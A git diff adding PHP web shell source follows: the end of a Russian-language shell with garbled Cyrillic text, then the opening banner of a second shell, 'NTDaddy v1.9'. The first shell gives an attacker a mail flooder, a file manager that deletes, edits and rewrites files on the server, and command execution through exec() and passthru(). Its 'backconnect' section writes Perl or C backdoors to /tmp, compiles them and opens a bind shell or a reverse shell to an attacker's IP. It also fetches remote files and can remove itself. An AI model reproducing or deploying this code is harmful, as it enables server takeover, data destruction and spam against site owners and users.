+echo <<<EOF
+<form action="?ac=mailfluder" method="post">
+<table align="center" border="0" bordercolor="#000000">
+<tr><td>Ìûëî æåğòâû</td><td><input type="text" name="email" value="to@mail.com" size="25"></td></tr>
+<tr><td>Îò ìûëà</td><td><input type="text" name="from" value="sypport@mail.com" size="25"></td></tr>
+<tr><td>×èñëî ïèñåì</td><td><input type="text" name="num" value="5" size="25"></td></tr>
+<tr><td>Òåêñò ôëóäà</td><td><input type="text" name="text" value="fack fack fack" size="25"></td></tr>
+<tr><td>Âåñ ïèñüìà (kb)</td><td><input type="text" name="kb" value="10" size="25"></td></tr>
+<tr><td colspan="2" align="center"><input type="submit">&nbsp;&nbsp;<input type="button" onclick="reset_form()" value="Reset"></td></tr>
+</table>
+</form>
+EOF;
+
+}
+break;
+
+case "tar":
+# àğõèâàöèÿ äèğåêòîğèè
+$fullpath = $d."/".$tar;
+/* çàäàåì ğàíäîìíûå íàçâàíèÿ ôàéëîâ àğõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $charsname .= $CHARS[rand(0,strlen($CHARS)-1)];
+ echo "<br>
+Êàòàëîã <u><b>$fullpath</b></u>  ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë <u>$charsname.tar.gz</u>";
+
+
+
+echo "
+
+<form action='?ac=tar' method='post'>
+<tr><td align=center colspan=2 class=pagetitle><b>Àğõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=archive size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè'></td>
+</tr></form>";
+
+exec($archive);
+
+break;
+
+
+// Íàâèãàöèÿ
+case "navigation":
+ // Ïîøëà íàâèãàöèÿ
+$mymenu = "  [<a href='$php_self?ac=navigation&d=$d&e=$e&delete=1'>Óäàëèòü</a>] [<a href='$php_self?ac=navigation&d=$d&ef=$e&edit=1'>Ğåäàêòèğîâàòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&clean=1'>Î÷èñòèòü</a>] [<a href='$php_self?ac=navigation&d=$d&e=$e&replace=1'>Çàìåíèòü òåêñò</a>] [<a href='$php_self?ac=navigation&d=$d&download=$e'>Çàãğóçèòü</a>]  [<a href='$php_self?ac=navigation&d=$d&infofile=$e'>Èíôîğìàöèÿ</a>]<br>";
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+
+
+
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?ac=navigation&d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?ac=navigation&d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?ac=navigation&d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+echo "</td></tr>";
+echo "<br><td><b>id:</b> ".@exec('id')."</td></tr";
+
+
+if(@$_GET['deldir']=="1"){
+
+@$dir=$_GET['d'];
+function deldir($d)
+{
+$handle = @opendir($d);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$d/$ff")){
+deldir("$d/$ff");
+}else{
+@unlink("$d/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($d)){
+@$success = true;}
+return @$success;
+}
+$dir=@$d;
+deldir($d);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<br><b>Êàòàëîã óäàëåí !</b>";
+echo $copyr;
+exit;}
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo $mymenu ;
+echo "
+Ñğåäñòâî çàìåíû:<br>
+(Òû ìîæåø çàìåíÿòü ëşáîé òåêñò)<br>
+Ôàéë: $de<br>
+<form method=post>
+1. Òâîé IP.<br>
+2. microsoft.com IP :)<br>
+Çàìåíÿòü ıòî <input name=this size=30 value=$ip> ıòèì <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Çàìåíèòü>
+</form>
+";
+
+if(@$_POST['doit']){
+
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$this","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$this Çàìåíåíî íà $bythis<br>
+[<a href='$php_self?ac=navigation&d=$d&e=$e'>Ïîñìîòğåòü ôàéë</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Óäàëèë $d/$e íå ïàğñÿ ! <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?ac=navigation&d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+echo "
+Ñîäåğæèìîå ôàéëà:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>";
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+Óäàëåíèå: Òû óâåğåí ?<br>
+<a href=\"$php_self?ac=navigation&d=$d&e=$e&delete=".@$delete."&yes=yes\">Äà</a> || <a href='$php_self?no=1'>Íåò</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red><br><b>ÒÎËÜÊÎ ×ÒÅÍÈÅ</b></font><br>";}}
+echo $mymenu ;
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Ğåäàêòèğîâàíèå:<br>
+$de<br>
+<form method=post>
+<input type=HIDDEN name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Ñîõğàíèòü èçìåíèÿ'></form><br>
+
+";
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+$editf=stripslashes($editf);
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?ac=navigation&d=$d&e=$ef\">";
+exit;
+}
+ 
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<a href='?ac=tar&d=$d' title='Àğõèâàöèÿ ïğîèçîéäåò òîëüêî ïğè íàëè÷èè ïğàâ çàïèñè â êàòàëîã !'><b>[Àğõèâàöèÿ êàòàëîãà] </b></a>
+<a href='?ac=tar&as=mail&d=$d' title='Ïğîèñõîäèò àğõèâàöèÿ êàòàëîãà + îòïğàâêà àğõèâà íà âàø e-mail ! Ô-öèÿ íå äîñòóïíà â 0.5à âåğñèè!'><b>[Àğõèâàöèÿ êàòàëîãà + Îòïğàâêà íà å-mail] </b></a>
+<a href='?ac=navigation&d=$d&deldir=1' title='Ïîëíîå óäàëåíèå êàòàëîãà !\n Ñïğàøèâàòü ïîäòâåğæäåíèÿ òåáÿ íèêòî íå áóäåò :)'><b>[Óäàëåíèå êàòàëîãà] </b></a>
+<tr><td bgcolor=#4d9ef0><center><b>Íàçâàíèå</b></td><td bgcolor=#4d9ef0><b>Ğàçìåğ</b></td><td bgcolor=#4d9ef0><b>Äîñòóï</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïğåùåí !</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+
+
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>";
+}
+}
+for ($i=0;$i<sizeof($files);$i++) {
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$prava=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='Äîñòóï $prava. Âëàäåëåö $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+break;
+// Óñòàíîâêà áåêäîğà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîğà / îòêğûòèå ïîğòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêğûòü ïîğò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàğîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêğûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîğà / áåêêîííåêò</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäğåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîğò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ğåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãğóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãğóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéë. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà:</b><br>
+ HTTP ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãğóçèòü ôàéë'></form>";
+
+
+if (!isset($status)) downfiles();
+
+else
+{
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãğóçèëè: <b>ôàéë <u>$file2</u> ğàçìåğîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãğóçêè ôàéëà</b></font></center>";
+}
+}
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåğàöèÿ md5 øèôğà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåğèğîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèğîâàíèå/äåêîäèğîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèğîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèğîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES êîäèğîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "Des ñãåíåğèğîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1 êîäèğîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåğèğîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèğè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ğåçóëüòàò:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãğóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãğóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<font color=red face=verdana size=1>Òû óâåğåí, ÷òî õî÷åø óäàëèòü ıòîò øåëë ñ ñåğâåğà ?<br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br>
+Áóäåì óäàëÿòü: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!!!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí !</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
+
+
+
diff --git a/php/NTDaddy v1.9.php b/php/NTDaddy v1.9.php
new file mode 100644
index 0000000..16df0a1
--- /dev/null
+++ b/php/NTDaddy v1.9.php	
@@ -0,0 +1,1012 @@
+<!--
+_______________________________________
+|NTDaddy v1.9 by obzerve of fux0r inc.|
+|=====================================|
+|Vol.1:_Art.19:_Silent_Tactics_Archive|
+|******! PUBLIC ! DISTRIBUTION !******|
+|-------------------------------------|
+|    Welcome to the world of ez remote|
+|administration made possible by your |
+|friends at fux0r inc. NTDaddy is the |
+|most kickass WinNT CGI ninja commando|
+|tool you've seen yet. Refer to the   |
+|included read me of the original pub |
+|distribution for details. Don't just |
+|give it out, make people look for it.|
+|And dont be a fuckin cock choking    |
+|gutter slut and try to pass it off as|
+|your own. Because if you do, you suck|
+|ass. Also to avoid hipocrisy, yes a  |
+|small snippet was borrowed for a few |
+|parts here and there but for the     |
+|majority is original code by me,     |
+|obzerve of fux0r inc. Anyway if you  |
+|find something that looks 'built-on',|
+|i just made it better, you know how  |
+|it is...              oh well, enjoy!|
+|-------------------------------------|
